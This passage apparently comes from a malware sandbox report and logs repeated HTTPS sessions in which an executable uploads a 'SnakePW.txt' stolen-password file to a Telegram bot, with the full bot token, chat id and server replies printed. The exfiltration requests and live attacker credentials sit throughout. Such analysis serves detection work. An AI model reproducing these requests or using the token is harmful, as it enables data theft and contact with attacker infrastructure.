2024-09-27 10:53:10 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 39 31 39 30 30 36 65 32 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce1919006e200Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:11 UTC	369	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:11 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:11 UTC	109	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49757	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:11 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce1a8328f39e5 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:11 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 31 61 38 33 32 38 66 33 39 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce1a8328f39e5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:20 UTC	369	IN	HTTP/1.1 429 Too Many Requests Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:20 GMT Content-Type: application/json Content-Length: 109 Connection: close Retry-After: 3 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:20 UTC	109	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49758	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:21 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce28d374b643b Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:21 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 32 38 64 33 37 34 62 36 34 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce28d374b643bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:21 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:21 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:21 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 30 31 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36909,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434401,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49759	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:22 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce462b857c4c3 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:22 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 36 32 62 38 35 37 63 34 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce462b857c4c3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:22 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:22 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 30 32 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36910,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434402,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49760	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:23 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce48b25642664 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:23 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 38 62 32 35 36 34 32 36 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce48b25642664Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:23 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:23 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 30 33 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36911,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434403,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49761	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:24 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce4b7ad6831a6 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:24 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 62 37 61 64 36 38 33 31 61 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce4b7ad6831a6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:24 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:24 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:24 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 30 34 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36912,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434404,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49762	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:26 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce4f09da9c850 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:53:26 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 66 30 39 64 61 39 63 38 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce4f09da9c850Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:27 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:27 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 30 37 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36913,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434407,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49763	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:53:28 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce576e1518677 Host: api.telegram.org Content-Length: 551
2024-09-27 10:53:28 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 35 37 36 65 31 35 31 38 36 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce576e1518677Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:53:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:53:28 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:53:28 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 30 38 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36914,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434408,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49764	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
